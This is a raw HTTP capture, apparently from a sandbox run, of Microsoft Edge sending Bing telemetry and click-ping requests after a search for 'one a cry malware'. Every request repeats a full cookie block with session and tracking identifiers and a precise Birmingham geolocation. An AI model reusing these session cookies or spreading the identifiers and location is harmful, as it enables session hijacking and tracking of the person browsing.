user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:59 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199039.14917091
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 642
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

cache-control: private
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
access-control-allow-origin: *
x-eventid: 67117bbf0412486ca0941b7665e6b065
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-QRANcZgzolaZ1lXYbIBFZO+TDw+3FlTaUE7NGz67MQ4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 2CB4CA5F597C469EB3DA99A5A7AF1A7E Ref B: LON601060106054 Ref C: 2024-10-17T21:03:59Z
content-length: 0
date: Thu, 17 Oct 2024 21:03:59 GMT
set-cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE; expires=Tue, 11-Nov-2025 21:03:59 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199039.14917190
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 685
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:00 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199040.149175c1
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.HoverLink%22%2C%22TS%22%3A1729199038141%2C%22Name%22%3A%22Hover%22%2C%22FID%22%3A%22Original%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.HoverLink%22%2C%22TS%22%3A1729199038141%2C%22Name%22%3A%22Hover%22%2C%22FID%22%3A%22Original%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199041.149177ee
POST

https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&ID=SERP,5036.1&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3D68aa766c6fbccdc4JmltdHM9MTcyOTEyMzIwMCZpZ3VpZD0zMDM4YWQ3ZC00ZDRmLTZjOTMtMmIyNC1iODY2NGNkODZkYmUmaW5zaWQ9NTAzNg%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D3038ad7d-4d4f-6c93-2b24-b8664cd86dbe%26u%3Da1L3Nob3A_cT1vbmUrYStjcnkrbWFsd2FyZSZGT1JNPVNIT1BUQg%26ntb%3D1

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/GLinkPingPost.aspx?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&ID=SERP,5036.1&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3D68aa766c6fbccdc4JmltdHM9MTcyOTEyMzIwMCZpZ3VpZD0zMDM4YWQ3ZC00ZDRmLTZjOTMtMmIyNC1iODY2NGNkODZkYmUmaW5zaWQ9NTAzNg%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D3038ad7d-4d4f-6c93-2b24-b8664cd86dbe%26u%3Da1L3Nob3A_cT1vbmUrYStjcnkrbWFsd2FyZSZGT1JNPVNIT1BUQg%26ntb%3D1 HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199043.14917e15
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 760
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199044.14918053
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199038836%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeClick%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199038891%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeClick%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199038836%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeClick%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199038891%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeClick%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

